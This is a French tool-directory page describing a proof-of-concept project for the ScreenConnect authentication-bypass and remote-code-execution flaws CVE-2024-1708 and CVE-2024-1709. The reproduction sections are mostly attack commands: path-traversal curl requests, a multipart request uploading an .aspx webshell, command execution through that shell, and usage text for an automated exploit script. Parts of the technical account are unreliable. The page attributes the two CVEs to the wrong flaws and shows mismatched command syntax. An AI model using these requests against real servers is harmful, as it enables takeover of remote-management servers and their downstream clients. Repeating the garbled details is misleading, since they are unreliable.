Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-1708-connectwise_rce_reproduction — Reproduction de cve-2024-1708-connectwise_rce_reproduction | Kitploit
Outils/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

Reproduction de cve-2024-1708-connectwise_rce_reproduction

Voir le dépôt
9il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-1708 / CVE-2024-1709 — ConnectWise ScreenConnect : Contournement d'authentification et exécution de code à distance

Score CVSS : 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE : CWE-22 (Traversée de chemin), CWE-288 (Contournement d'authentification via un chemin alternatif)
Logiciel affecté : ConnectWise ScreenConnect (anciennement ScreenConnect) ≤ 23.9.7
Découvert et signalé : Février 2024
Exploité dans la nature : LockBit, Black Basta, Bl00dy et autres affiliés de rançongiciels


Table des matières

  1. Aperçu
  2. Détails techniques
  3. Versions affectées
  4. Étapes de reproduction
  5. Utilisation de la preuve de concept
  6. Atténuation
  7. Références

1. Aperçu

CVE-2024-1708 et CVE-2024-1709 sont une paire de vulnérabilités enchaînées dans ConnectWise ScreenConnect (anciennement ConnectWise Control) qui, ensemble, permettent à un attaquant distant non authentifié d'obtenir une exécution de code à distance complète sur le serveur ScreenConnect.

  • CVE-2024-1708 — Contournement d'authentification par traversée de chemin. Le point de terminaison SetupWizard.aspx (et les points de terminaison d'installation/mise à niveau associés) ne nettoie pas correctement les séquences de traversée de chemin fournies par l'utilisateur (../). Un attaquant non authentifié peut traverser en dehors du répertoire d'installation prévu et atteindre des points de terminaison qui devraient exiger une authentification. Parce que l'assistant s'exécute dans le contexte du compte SYSTEM (Windows) ou root (Linux), l'attaquant hérite de privilèges élevés.

  • CVE-2024-1709 — Téléchargement de fichier sans restriction menant à une RCE. Une fois le contournement d'authentification effectué, un attaquant peut télécharger un fichier .aspx arbitraire ou tout autre fichier exécutable dans la racine web. En demandant ensuite le fichier téléchargé, du code arbitraire s'exécute sur le serveur.

Impact

Ces vulnérabilités ont été exploitées massivement à partir du 19 février 2024 par plusieurs groupes de rançongiciels :

Groupe de rançongicielsNotes sur la campagne
LockBitScan large des instances ScreenConnect ; utilisé pour déployer le chiffreur LockBit en aval.
Black BastaA exploité l'accès aux MSP pour pivoter dans les réseaux clients gérés.
Bl00dyCampagnes à plus petite échelle ciblant des serveurs ScreenConnect non patchés.

Parce que ScreenConnect est couramment déployé par les fournisseurs de services gérés (MSP) pour gérer à distance des centaines de terminaux clients en aval, un seul serveur ScreenConnect compromis permet une attaque par chaîne d'approvisionnement — chaque client avec un agent connecté à ce serveur ScreenConnect est à risque.


2. Détails techniques

2.1 Contournement d'authentification (CVE-2024-1708)

Le serveur ScreenConnect expose un assistant d'installation à l'adresse :

/SetupWizard.aspx/

Dans certains états de mise à niveau/réparation, le serveur n'applique pas l'authentification car il suppose que l'assistant d'installation est l'expérience de première exécution. Le défaut critique réside dans la manière dont le serveur traite le cookie __Session ou les en-têtes Transfer-Encoding / Content-Type lors de l'accès aux chemins sous l'espace de noms de l'assistant.

En envoyant une requête à :

/SetupWizard.aspx/../../ScreenConnect/Login.aspx

la traversée de chemin annule le contexte « assistant d'installation », tandis que le serveur croit toujours que le contexte de session non authentifiée s'applique. L'attaquant est redirigé ou reçoit des pages comme s'il était authentifié.

Vecteur alternatif : les gestionnaires PrepareUpgrade.aspx / PostUpgrade.aspx manquent également de contrôles d'authentification et exposent des fonctionnalités de téléchargement de fichiers.

2.2 Exécution de code à distance (CVE-2024-1709)

Une fois que l'attaquant atteint un point de terminaison authentifié (ou frappe directement le gestionnaire de téléchargement de fichiers dans le contexte de l'installation), il peut télécharger un webshell .aspx malveillant :

POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

Le fichier est écrit dans le répertoire de l'application web (par exemple, C:\Program Files\ScreenConnect\Website\). Demander le shell téléchargé l'exécute sous l'identité du serveur.

2.3 Cause racine (CWE-22 / CWE-288)

  • Le serveur ne parvient pas à canonicaliser le chemin de la requête avant le routage.
  • Le gestionnaire SetupWizard.aspx suppose que toute requête sous sa route fait partie du processus d'installation et doit contourner l'authentification — mais la traversée de chemin brise cette hypothèse.
  • Aucune validation appropriée des séquences ../ ou de la traversée des liens symboliques.

3. Versions affectées

Plage de versionsStatut
23.9.7 et versions antérieuresVulnérable
23.9.8Corrigé (publié le 20 février 2024)
23.9.9Corrigé
23.9.10 (dernière)Corrigé

Remarque : Les serveurs ScreenConnect auto-hébergés (sur site) sont les principales cibles. Les instances ScreenConnect hébergées par ConnectWise (cloud) ont été corrigées avant la divulgation publique et n'ont jamais été vulnérables.


4. Étapes de reproduction

4.1 Configuration du laboratoire

  1. Téléchargez une version vulnérable de ScreenConnect (23.9.7 ou antérieure).
    Les installateurs officiels peuvent être disponibles via les archives partenaires ConnectWise. Pour les tests, utilisez une machine virtuelle isolée.
  2. Installez sur un Windows Server (2019/2022) ou un hôte Linux.
    • Chemins d'installation par défaut :
      • Windows : C:\Program Files\ScreenConnect\
      • Linux : /opt/screenconnect/
    • Port web par défaut : 8040 (HTTP) ou 443 (HTTPS si configuré)
  3. Assurez-vous que le serveur est isolé du réseau — ne l'exposez pas à Internet pendant les tests.

4.2 Vérifier la vulnérabilité

# Vérifier la version
curl -s http://<cible>:8040/ | Select-String "ScreenConnect"

Ou accédez à l'interface web et notez le numéro de version dans le code source de la page.

4.3 Test de traversée de chemin

curl -v --path-as-is "http://<cible>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

Comportement attendu sur un serveur vulnérable :

  • La réponse renvoie un 200 OK ou une redirection 302 vers une page de session authentifiée sans l'invite de connexion normale.
  • La réponse peut contenir le HTML de la console d'administration ScreenConnect.

4.4 Téléchargement du webshell

curl -X POST "http://<cible>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 Exécuter des commandes

curl "http://<cible>:8040/shell.aspx?cmd=whoami"

5. Utilisation de la preuve de concept

Le script exploit.py ci-joint automatise les étapes ci-dessus :

usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS
Télécharger l’outil